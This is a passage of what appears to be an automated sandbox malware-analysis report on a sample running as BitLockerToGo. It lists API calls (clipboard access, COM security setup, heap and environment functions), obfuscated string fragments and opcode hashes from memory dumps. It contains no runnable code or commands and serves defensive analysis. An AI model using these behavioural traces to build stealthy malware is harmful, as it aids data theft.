                                                                                • Opcode Fuzzy Hash: 8b12c406fd4ead613e65197ffde3b6cb62fb5e3e077589beab3fbb298c2b36b5
                                                                                • Instruction Fuzzy Hash: 31110434908686CFC719DB3888512A8BFB27F6B304F05839CC48D873A2DB35A954CF22
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: BlanketProxy
                                                                                • String ID:
                                                                                • API String ID: 3890896728-0
                                                                                • Opcode ID: 8f7cb6371b4caf162f46c922943df2f09589c22896729318bee07ad160b03f59
                                                                                • Instruction ID: eb4d188fa3b2335ac580bcc65c14ba02f7638069044a76079abd789a2c862b60
                                                                                • Opcode Fuzzy Hash: 8f7cb6371b4caf162f46c922943df2f09589c22896729318bee07ad160b03f59
                                                                                • Instruction Fuzzy Hash: B8F0E2B56097028FE301DF25C55874BBBE6BBC8314F25891CE0A44B751C7B9AA898FC2
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: BlanketProxy
                                                                                • String ID:
                                                                                • API String ID: 3890896728-0
                                                                                • Opcode ID: 2c655fd4df2f0de855ff40a5662be0aaac86da99f90f76558f58a47c1ac7514f
                                                                                • Instruction ID: 6701a38e9beb56b1775abd9ce08e5b6b7616d16b42eebe8ce345441057ef8d6a
                                                                                • Opcode Fuzzy Hash: 2c655fd4df2f0de855ff40a5662be0aaac86da99f90f76558f58a47c1ac7514f
                                                                                • Instruction Fuzzy Hash: BBF074B46093029FE354DF69D5A871BBBE1EB88304F11881DE5958B390D7B59648CF82
                                                                                APIs
                                                                                • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C673
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize
                                                                                • String ID:
                                                                                • API String ID: 2538663250-0
                                                                                • Opcode ID: 413737427438556d5fa7e0556733acb83c5b4eac6897b874756f3227497564db
                                                                                • Instruction ID: a6b7534e426cd29cb0e1e31caee4a3ce77516a25d8fe1d9d75e6d40f069d1f8c
                                                                                • Opcode Fuzzy Hash: 413737427438556d5fa7e0556733acb83c5b4eac6897b874756f3227497564db
                                                                                • Instruction Fuzzy Hash: CBE0C236E506442BD6046B1CDC47F8A3A1AC3C3726F4C8234A550CA2C5E938B910C15E
                                                                                APIs
                                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C6B0
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeSecurity
                                                                                • String ID:
                                                                                • API String ID: 640775948-0
                                                                                • Opcode ID: 4b317f61b4ed6c220f3feb26dab4a859da40cf1549f870816065b6807c59d919
                                                                                • Instruction ID: ca338ed000cba09c134a9ecbf479b52692d88648cc8417c010cf118771328cdf
                                                                                • Opcode Fuzzy Hash: 4b317f61b4ed6c220f3feb26dab4a859da40cf1549f870816065b6807c59d919
                                                                                • Instruction Fuzzy Hash: 7DE05E39BD47406BFA385B08DC13F4422129386F21F388224B310EE7D9C8A8B501420C
                                                                                APIs
                                                                                • GetForegroundWindow.USER32 ref: 0043E6A5
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: ForegroundWindow
                                                                                • String ID:
                                                                                • API String ID: 2020703349-0
                                                                                • Opcode ID: b48e2f79c62e4811e334b2433c8222d9ec698c1a03c7fb9f9c38adda7ff18471
                                                                                • Instruction ID: eb5cd64e0cd090f695d5de900f82e4eebcc02a3ea27d0b2ee91ac1c0039229b8
                                                                                • Opcode Fuzzy Hash: b48e2f79c62e4811e334b2433c8222d9ec698c1a03c7fb9f9c38adda7ff18471
                                                                                • Instruction Fuzzy Hash: 2BC012EC9084808BC248EB12EC4252A3B5EAA8A209B049038D80B02B23E9306805968A
                                                                                APIs
                                                                                • RtlFreeHeap.NTDLL(?,00000000,00000000,0043D8F6,?,?,?,00000000,0040B40D,00000000,00000000), ref: 0043BCCE
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: FreeHeap
                                                                                • String ID:
                                                                                • API String ID: 3298025750-0
                                                                                • Opcode ID: 85ba4f6bb3df290ded2e1b23f993eb3f5d5984f7020326030569786283a59457
                                                                                • Instruction ID: 6c6d5fcf156c4dc9181b7fd85535f9ef3000d663acf77e4cc9904710c0b9b036
                                                                                • Opcode Fuzzy Hash: 85ba4f6bb3df290ded2e1b23f993eb3f5d5984f7020326030569786283a59457
                                                                                • Instruction Fuzzy Hash: AED01231405122EBC7241F18FD06B873B64DF0A321F030472B8006B071C664EC519AD8
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(?,00000000,?,AC36FDA1,00408797,2D2C008A), ref: 0043BCA0
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: b3415836e398222536a54de0d850da02531c529426d1bee4289f1127ff9466bd
                                                                                • Instruction ID: 28c2b2b5d3f1f64fcd0aca9316f6b1f640d95bbb8965ee836e226e74b875d2a4
                                                                                • Opcode Fuzzy Hash: b3415836e398222536a54de0d850da02531c529426d1bee4289f1127ff9466bd
                                                                                • Instruction Fuzzy Hash: DBC09B31445121ABC6142B15FD05FC67F64DF45355F114066B40467073C770AC41D6D8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ($?$f$u$}
                                                                                • API String ID: 0-3561895482
                                                                                • Opcode ID: 034806d3cc72206703f70723c548ba8ea1711a660e6f03707adc4ef9bcdfc4e3
                                                                                • Instruction ID: 86e3bcde5e116734b7454ff0522683787c5f8ed0e2df54b8e8f55331097e388c
                                                                                • Opcode Fuzzy Hash: 034806d3cc72206703f70723c548ba8ea1711a660e6f03707adc4ef9bcdfc4e3
                                                                                • Instruction Fuzzy Hash: B212A371A0D7808BD324DF39C4813AFBBE1ABD5314F198A2FE5D997391D63889418B47
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 004238A8
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,6A195A3A), ref: 0042394C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID: 52$QVTH$]VWC$lnmh$n`fn
                                                                                • API String ID: 237503144-3964871452
                                                                                • Opcode ID: f42c4c6db4055bdca425bc9ce26f544c9401cc625d8d536d0403780354460537
                                                                                • Instruction ID: 3b8b4807c8318ae77837d9a5b010143032c821d60a60d601bdcb57454f2de873
                                                                                • Opcode Fuzzy Hash: f42c4c6db4055bdca425bc9ce26f544c9401cc625d8d536d0403780354460537
                                                                                • Instruction Fuzzy Hash: 2FE1457160C3518FD720CF68D8917ABBBE1EB85314F444A3EF99587381D3B89906CB9A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1766240007.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: %$&$9$<$R$T$W$b
                                                                                • API String ID: 0-3780034300
                                                                                • Opcode ID: 1461b86cfa4d3767ede56ba77eb50cf2841e928c2e72e09b72740e390ede6aa9
                                                                                • Instruction ID: 26f6469176a43b47c6e288f4693b2497bb05b8a0a051c4656522d96c8d770806
                                                                                • Opcode Fuzzy Hash: 1461b86cfa4d3767ede56ba77eb50cf2841e928c2e72e09b72740e390ede6aa9
                                                                                • Instruction Fuzzy Hash: 10719F2250C7C28AD3128A7C484425BEFD25BE7234F2D9FADF4E5873D2C56AC50A9367
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: Clipboard$CloseDataGlobalLockOpen
                                                                                • String ID:
                                                                                • API String ID: 1494355150-0
                                                                                APIs
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 00428DFB
                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 00428F3C
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID: rM$zM
                                                                                • API String ID: 237503144-2784921869
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit
                                                                                • String ID: `$b$d$f$h$j$l$n$x$|$~
                                                                                • API String ID: 2610073882-2392625418
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit
                                                                                • String ID: `$b$d$f$h$j$l$n$x$|$~
                                                                                • API String ID: 2610073882-2392625418
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID: !$0
                                                                                • API String ID: 3664257935-301933775
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: FreeString
                                                                                • String ID: 0$0NuNup=Nu
                                                                                • API String ID: 3341692771-489510435
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: FreeString
                                                                                • String ID: 0$0NuNup=Nu
                                                                                • API String ID: 3341692771-489510435